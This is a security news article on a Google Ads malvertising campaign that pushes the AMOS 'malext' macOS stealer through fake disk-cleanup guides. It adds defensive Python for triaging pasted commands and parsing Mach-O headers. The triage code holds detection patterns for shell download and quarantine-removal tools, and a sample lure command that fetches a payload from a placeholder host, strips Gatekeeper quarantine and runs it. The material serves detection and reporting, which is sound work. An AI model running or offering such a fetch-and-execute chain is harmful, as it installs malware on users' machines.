A malvertising campaign delivers the AMOS "malext" macOS infostealer through deceptive text-sharing lures.

An aggressive malvertising operation targeting Apple's macOS platform worldwide is distributing an updated AMOS variant known as "malext".

The attackers buy Google Ads that promote misleading how-to guides hosted on text-sharing sites. These pages lure users with the promise of a quick, free fix for a common problem, while the "solution" they offer is a command that silently installs malware on the victim's computer.

A user searching for how to free up disk space on macOS (a "storage cleaning" query, for example) finds what looks like a legitimate how-to article published on Medium.

The convincing article contains a ready-to-paste shell command presented as the "solution".

When the machine began repeatedly prompting for the administrator password, the user grew suspicious and narrowly avoided a full compromise of the system. That incident triggered a wider investigation.

The malware was identified by researcher Gi7w0rm after a tip from @itspappy, who had discovered macOS malware being distributed through a ClickFix-style technique tied to compromised Google Ads accounts.


Using Google's Ads Transparency Center, investigators identified nearly three dozen active malicious ads and at least fifty-three compromised Google Ads accounts being used to spread the lures.

The scale of the operation points to a large criminal group, possibly affiliated with the affiliate teams known as "the Traffers".

Besides Medium, the attackers also hosted their lures on Evernote and other note-sharing services whose public pages can be read without logging in.

Each time a malicious page was taken down, the attackers quickly replaced it, showing a well-maintained and persistent operation.

Google malvertising targeting MacOS users (Source - Medium)
These pages mimic genuine troubleshooting guides, walking the user through two steps before arriving at the malicious final command.

Medium.com lure (Source - Medium)
The final payload is "malext", an updated variant of the AMOS stealer family, named for the malext command-and-control channel it reports to. [...] The malext code is built into the stealer's template.

Once executed, the stealer collects browser session data, notes from Apple Notes, Safari cookies, cryptocurrency wallet contents, Telegram chat data, and credentials stored in the macOS Keychain.

It also replaces the Ledger and Trezor wallet applications with trojanized versions, giving the attackers control over the victims' funds.

Inside the Kill Chain: Infection and Persistence
The infection begins when the user pastes the command from the malicious page into the Terminal.

The command was sourced directly from an online template on Medium.
Decoding the Base64-encoded command reveals an HTTP GET request for a remote file that is itself gzip-compressed and Base64-encoded, a somewhat unusual layering of obfuscation.

Once fully unpacked, the payload copies an executable into a temporary directory, strips the quarantine attribute with `xattr` so that Gatekeeper raises no warning, and runs it without any confirmation prompt.
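A defender reviewing a pasted "fix" command wants to see through the Base64 layer and flag the steps described above (remote fetch, gzip and Base64 unpacking, a write to a temp directory, quarantine removal, execution) without running anything. The following is an added example, not code from the original article or from the researchers it cites; the sample command it analyzes is constructed here with a placeholder host (`example.invalid`) and the indicator names and scoring thresholds are this example's own assumptions.

```python
import base64
import binascii
import re

# Indicators a defender looks for in a ClickFix-style pasted command.
# Names and patterns are this example's own assumptions, not a published rule set.
INDICATORS = [
    ("base64_decode", re.compile(r"\bbase64\s+(-d|-D|--decode)\b")),
    ("remote_fetch", re.compile(r"\b(curl|wget)\b")),
    ("gzip_unpack", re.compile(r"\b(gunzip|gzip\s+-d|zcat)\b")),
    ("quarantine_strip", re.compile(r"\bxattr\b.*(-c\b|-d\s+com\.apple\.quarantine|-r\b)")),
    ("temp_dir_write", re.compile(r"(/tmp/|/private/tmp/|\$TMPDIR|/var/folders/)")),
    ("pipe_to_shell", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    ("chmod_exec", re.compile(r"\bchmod\s+\+x\b")),
]

# A run of Base64 alphabet characters long enough to be worth decoding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _try_decode(blob: str):
    """Decode one Base64 run; return it as text only if it decodes to printable UTF-8."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text or not all(ch.isprintable() or ch in "\n\t" for ch in text):
        return None
    return text


def decode_layers(command: str, max_depth: int = 5) -> list:
    """Return the command plus every nested Base64 layer that decodes to text."""
    layers = [command]
    frontier = [command]
    for _ in range(max_depth):
        next_frontier = []
        for text in frontier:
            for blob in B64_RUN.findall(text):
                decoded = _try_decode(blob)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    next_frontier.append(decoded)
        if not next_frontier:
            break
        frontier = next_frontier
    return layers


def analyze_command(command: str) -> dict:
    """Score a pasted command across all decoded layers and return a triage report."""
    layers = decode_layers(command)
    hits = set()
    for text in layers:
        for name, pattern in INDICATORS:
            if pattern.search(text):
                hits.add(name)
    # Threshold is an assumption: quarantine removal alone is decisive, otherwise
    # three or more indicators together are treated as malicious.
    if "quarantine_strip" in hits or len(hits) >= 3:
        verdict = "malicious"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"layers": layers, "indicators": sorted(hits), "verdict": verdict}


# Constructed sample mirroring the stages described in the article: an outer
# Base64 wrapper around a fetch / unpack / temp-write / xattr / execute chain.
# The host is a placeholder; nothing here contacts the network.
_INNER = ("curl -s http://example.invalid/payload | base64 -d | gunzip > /tmp/upd; "
          "xattr -c /tmp/upd; chmod +x /tmp/upd; /tmp/upd")
SAMPLE_LURE_COMMAND = "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | sh"

if __name__ == "__main__":
    report = analyze_command(SAMPLE_LURE_COMMAND)
    print("verdict:", report["verdict"])
    print("indicators:", ", ".join(report["indicators"]))
    for i, layer in enumerate(report["layers"]):
        print(f"layer {i}: {layer}")
```

The same function can be pointed at shell history or at command lines collected by an EDR agent; a hit on `quarantine_strip` is the single strongest signal here because legitimate one-line "fixes" have no reason to clear Gatekeeper's quarantine flag on a freshly downloaded binary.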

The stealer itself is a universal Mach-O binary built for both ARM (Apple silicon) and 64-bit Intel Macs; before running its main payload it checks whether it is executing inside a virtual machine.
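When a dropped binary lands in a temp directory, a first triage question is what the article states about this one: is it a universal Mach-O carrying both an arm64 and an x86_64 slice, and do the slices agree with what the fat header declares? The parser below is an added example, not code from the article or from the researchers; it reads only the fat header and each slice's Mach-O header, and the sample it parses is a constructed header-only image (no load commands, no code), so the `ncmds` value and slice offsets are made up for illustration.

```python
import struct

FAT_MAGIC = 0xCAFEBABE      # universal (fat) header, always big-endian
MH_MAGIC = 0xFEEDFACE       # 32-bit thin Mach-O header
MH_MAGIC_64 = 0xFEEDFACF    # 64-bit thin Mach-O header
CPU_NAMES = {0x01000007: "x86_64", 0x0100000C: "arm64", 0x00000007: "i386", 0x0000000C: "arm"}
FILETYPES = {1: "object", 2: "execute", 6: "dylib", 8: "bundle"}


def parse_thin_header(data: bytes, offset: int = 0) -> dict:
    """Parse the thin Mach-O header at `offset` (either byte order); raise ValueError otherwise."""
    if len(data) < offset + 20:
        raise ValueError(f"not enough bytes for a Mach-O header at {offset:#x}")
    magic_le, = struct.unpack_from("<I", data, offset)
    magic_be, = struct.unpack_from(">I", data, offset)
    if magic_le in (MH_MAGIC, MH_MAGIC_64):
        endian = "<"
    elif magic_be in (MH_MAGIC, MH_MAGIC_64):
        endian = ">"
    else:
        raise ValueError(f"no Mach-O magic at offset {offset:#x}")
    magic, cputype, _cpusubtype, filetype, ncmds = struct.unpack_from(endian + "IIIII", data, offset)
    return {
        "bits": 64 if magic == MH_MAGIC_64 else 32,
        "cpu": CPU_NAMES.get(cputype, f"unknown({cputype:#x})"),
        "filetype": FILETYPES.get(filetype, f"unknown({filetype})"),
        "ncmds": ncmds,
    }


def triage_macho(data: bytes) -> dict:
    """Summarize a thin or fat Mach-O image: format, per-slice headers, and whether it is
    a universal arm64 + x86_64 binary. For fat files, each slice's own header is parsed and
    compared with the CPU type the fat_arch entry declares; a mismatch is worth a closer look."""
    if len(data) < 8:
        raise ValueError("file too short to be Mach-O")
    magic_be, nfat = struct.unpack_from(">II", data, 0)
    # Java class files share the CAFEBABE magic; their next field is a version (>= 45),
    # so a small slice count is used here to tell the two apart.
    if magic_be == FAT_MAGIC and 1 <= nfat <= 16:
        slices = []
        for i in range(nfat):
            cputype, _sub, offset, size, _align = struct.unpack_from(">IIIII", data, 8 + i * 20)
            if offset + size > len(data):
                raise ValueError(f"fat_arch slice {i} runs past end of file")
            hdr = parse_thin_header(data, offset)
            hdr["declared_cpu"] = CPU_NAMES.get(cputype, f"unknown({cputype:#x})")
            hdr["consistent"] = hdr["declared_cpu"] == hdr["cpu"]
            slices.append(hdr)
        cpus = {s["cpu"] for s in slices}
        return {"format": "fat", "slices": slices, "universal_arm64_x86_64": {"arm64", "x86_64"} <= cpus}
    hdr = parse_thin_header(data, 0)
    return {"format": "thin", "slices": [hdr], "universal_arm64_x86_64": False}


def build_sample_universal() -> bytes:
    """Constructed sample: fat header with an x86_64 and an arm64 MH_EXECUTE slice.
    Only headers are present; offsets, sizes and ncmds are illustrative values."""
    def thin(cputype: int) -> bytes:
        # magic, cputype, cpusubtype, filetype=2 (execute), ncmds, sizeofcmds, flags, reserved
        return struct.pack("<IIIIIIII", MH_MAGIC_64, cputype, 0, 2, 3, 0, 0, 0)
    fat = struct.pack(">II", FAT_MAGIC, 2)
    fat += struct.pack(">IIIII", 0x01000007, 3, 0x1000, 32, 12)   # x86_64 slice
    fat += struct.pack(">IIIII", 0x0100000C, 0, 0x2000, 32, 14)   # arm64 slice
    image = bytearray(0x2000 + 32)
    image[:len(fat)] = fat
    image[0x1000:0x1000 + 32] = thin(0x01000007)
    image[0x2000:0x2000 + 32] = thin(0x0100000C)
    return bytes(image)


if __name__ == "__main__":
    report = triage_macho(build_sample_universal())
    print("format:", report["format"], "| universal arm64+x86_64:", report["universal_arm64_x86_64"])
    for s in report["slices"]:
        print(f"  {s['cpu']:7} {s['bits']}-bit {s['filetype']} ncmds={s['ncmds']} consistent={s['consistent']}")
```

On a real sample you would pass `open(path, "rb").read()` instead of the constructed image; a universal executable in `/tmp` that was never quarantined is exactly the combination the kill chain above produces, and the per-slice `consistent` flag catches fat headers that have been hand-edited to hide a slice.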
